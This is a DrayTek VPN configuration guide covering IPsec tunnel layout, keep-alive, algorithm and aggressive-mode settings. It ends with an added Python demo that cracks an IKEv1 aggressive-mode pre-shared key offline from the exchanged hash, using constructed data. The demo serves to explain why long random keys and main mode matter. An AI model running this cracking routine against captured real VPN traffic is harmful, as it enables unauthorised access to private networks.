DrayTek VPN tunnels are very stable. Part of this is due to the design and code behind the routers, but knowing how to set up the tunnels properly for maximum uptime is an important and sometimes overlooked step when customers test our routers. In this example I will set up an IPsec tunnel between a Vigor 2910 and a Vigor 2800.

When building an IPsec tunnel, the first thing I always consider is who is dialing and who is receiving. Customers will often want either a bi-directional tunnel or a tunnel that fits into an existing server/client VPN infrastructure. Several factors go into choosing a layout, the foremost being the type of WAN connection at each end: is the public address static, or dynamic (DHCP)?

If both ends are static, a bi-directional tunnel will be fairly stable, though for reasons I will get into in a moment I consider a clear server/client relationship more stable than a bi-directional one. If one or both sides are dynamic, you have to set up a DDNS service for each dynamic router. If one side is static and the other dynamic, you can go one of two ways. If the dynamic router already has a DDNS name, have the static side dial out to the dynamic side's DDNS name; this avoids the need for an aggressive mode tunnel, because in main mode the receiving end identifies the caller by its source IP address, and the static side has one. If you do not have a DDNS name, the dynamic side must dial in to the static side, and because the receiving end cannot identify the caller by a fixed IP address you will have to use an aggressive mode tunnel. If both are dynamic, the caller/callee relationship does not matter so much, but again the tunnel will be aggressive mode.

In my case both ends of the tunnel are static, which is the ideal situation for IPsec VPNs and will yield the best uptime, so I will designate the 2800 as the Client (Dial-Out) and the 2910 as the Server (Dial-In). Now that we know the general layout of the IPsec tunnel we can begin configuration, starting with the Dial-Out or Client router:
The important settings here are Always On, which can only be selected for a Dial-Out connection, and "Enable PING to keep alive", which should always be set to the LAN IP of the remote end. Pinging an address that is only reachable through the tunnel keeps traffic flowing so an idle tunnel is not torn down, and a failed ping is a genuine sign that the tunnel needs to be re-established. Now we will set up the Dial-Out settings:
Strictly speaking, none of these settings relates directly to VPN stability; they are the nuts and bolts of establishing the tunnel. The IKE authentication (pre-shared key) must match at both ends, and "Server IP/Host Name" can be either a static IP or a DDNS name. The Dial-Out settings are the only place where a host name is allowed without defining an IPsec Peer Identity. For simplicity's sake, this is why I always recommend having the static address dial out to the dynamic one, because you can enter the DDNS host name here.

Next we define the Advanced IPsec settings, where the encryption algorithms for the tunnel are chosen:

Here I have chosen 3DES, MD5 and DH Group 2. On DrayTek routers 3DES generally gives the best performance-to-strength ratio, because 3DES is handled in hardware whereas AES is handled in software. Bear in mind that 3DES, MD5 and the 1024-bit Group 2 are all considered weak by current standards; if both ends support AES and SHA with a larger DH group at acceptable throughput, prefer those. Phase 1 and Phase 2 lifetimes depend on the level of security you are trying to achieve: setting them to the maximum means fewer rekeys, which often improves uptime, at the cost of more traffic being protected under a single key before it is rotated.

Finally we define the TCP/IP settings for the tunnel, which populate the routing entries for traffic across the VPN:

In general leave "My WAN IP" and "Remote Gateway IP" at 0.0.0.0; these are only needed to satisfy strict ACL settings on the far end. RIP should generally be turned off as well. This completes the settings for the VPN Client or Dial-Out device. In this screenshot we examine the Dial-In settings on the 2910, the Server:
There isn't much to configure for the Dial-In settings: you specify the IP or IPsec identity of the node dialing in, then the allowed IPsec security methods. Unchecking AH is important here, because AH only authenticates packets and does not encrypt them; leaving only ESP selected ensures the tunnel is actually encrypted. You will notice there is no need to specify the exact encryption type used by the far end: the DrayTek will auto-negotiate to the caller's proposal as long as that method is checked under "IPSec Security Method". For the same reason, uncheck any method you do not want to accept, since anything left checked can be negotiated. If you need to set up a tunnel where a dynamic client is dialing out, you must set up an aggressive mode tunnel. On the client this is done under the Advanced IPsec settings:
Specifying a Local ID is an important step, as this is how the remote end will identify the caller. On the server side, the Peer ID is set to whatever was specified as the Local ID on the client side. Because aggressive mode sends the identities and the authentication hashes before any encryption is in place, a passive observer can test pre-shared key guesses offline against the captured hash, so use a long, random pre-shared key for any aggressive mode tunnel. Finally, we check the Connection Management screen to see our established VPN:
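To show why the pre-shared key on an aggressive mode tunnel must be strong, here is an added example (not code from the original article or from DrayTek) that follows the IKEv1 key derivation in RFC 2409, section 5, with HMAC-MD5 as the prf to match the 3DES/MD5/Group 2 proposal used above. In aggressive mode the initiator's HASH_I, and every input to it other than the PSK (nonces, DH public values, cookies, the SA proposal and the Local ID), crosses the wire unencrypted, so anyone who captured the exchange can test PSK candidates offline. The exchange, the PSK `draytek123`, the Local ID `vigor2800.example.net` and the wordlist are all constructed for the demo, not a real capture.

```python
"""
Offline pre-shared key check against an IKEv1 aggressive-mode exchange.

Added example, not from the original article or from DrayTek. Follows
RFC 2409 section 5 (pre-shared key authentication) with HMAC-MD5 as prf.
All field values are CONSTRUCTED random stand-ins, not captured traffic.
"""
import hashlib
import hmac
import os
from typing import Iterable, Optional


def ike_prf(key: bytes, data: bytes) -> bytes:
    """RFC 2409 prf: HMAC keyed with the negotiated hash (MD5 here)."""
    return hmac.new(key, data, hashlib.md5).digest()


def hash_i(psk: bytes, ex: dict) -> bytes:
    """Initiator authentication hash, sent in the clear in aggressive mode msg 3.

    SKEYID = prf(PSK, Ni_b | Nr_b)
    HASH_I = prf(SKEYID, g^xi | g^xr | CKY-I | CKY-R | SAi_b | IDii_b)
    """
    skeyid = ike_prf(psk, ex["ni"] + ex["nr"])
    return ike_prf(
        skeyid,
        ex["gxi"] + ex["gxr"] + ex["cky_i"] + ex["cky_r"] + ex["sai"] + ex["idii"],
    )


def build_constructed_exchange(psk: bytes, local_id: bytes) -> dict:
    """Simulate the public fields of an aggressive-mode exchange.

    Random bytes stand in for the nonces, the Group 2 (1024-bit) DH public
    values, the ISAKMP cookies and the initiator's SA payload body. The
    identity is an FQDN-type ID payload body (type 2), which is what the
    dial-out client's Local ID becomes on the wire. Everything in the
    returned dict, including HASH_I, is visible to a passive observer.
    """
    ex = {
        "ni": os.urandom(16),
        "nr": os.urandom(16),
        "gxi": os.urandom(128),
        "gxr": os.urandom(128),
        "cky_i": os.urandom(8),
        "cky_r": os.urandom(8),
        "sai": os.urandom(40),
        # ID payload body: ID type (FQDN = 2), protocol ID, port, then the name.
        "idii": bytes([2, 0, 0, 0]) + local_id,
    }
    ex["hash_i"] = hash_i(psk, ex)
    return ex


def crack_psk(ex: dict, candidates: Iterable[bytes]) -> Optional[bytes]:
    """Recover the PSK from the observed HASH_I by trying each candidate.

    Each guess costs two HMAC-MD5 operations, so a dictionary word or short
    PSK falls almost instantly; a long random PSK does not.
    """
    for cand in candidates:
        if hmac.compare_digest(hash_i(cand, ex), ex["hash_i"]):
            return cand
    return None


if __name__ == "__main__":
    wordlist = [b"password", b"vigor", b"draytek", b"draytek123"]
    weak = build_constructed_exchange(b"draytek123", b"vigor2800.example.net")
    print("weak PSK recovered:", crack_psk(weak, wordlist))
    strong = build_constructed_exchange(os.urandom(32), b"vigor2800.example.net")
    print("strong PSK recovered:", crack_psk(strong, wordlist))
```

The same check works against the responder's HASH_R from message 2 (swap the operand order and use IDir), which is why an attacker does not even need to capture a legitimate session: initiating an aggressive mode exchange to the server is enough to obtain a hash to attack. A main mode tunnel does not expose these hashes, which is the reason the article prefers main mode wherever a static address can dial out to the dynamic side.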
Following these guidelines will lead to a more stable VPN with better uptime, which means fewer problems and happier users. You are now ready to apply QoS to the VPN tunnel for use with VoIP, another great feature of our routers. For help with that, check out our QoS Guide.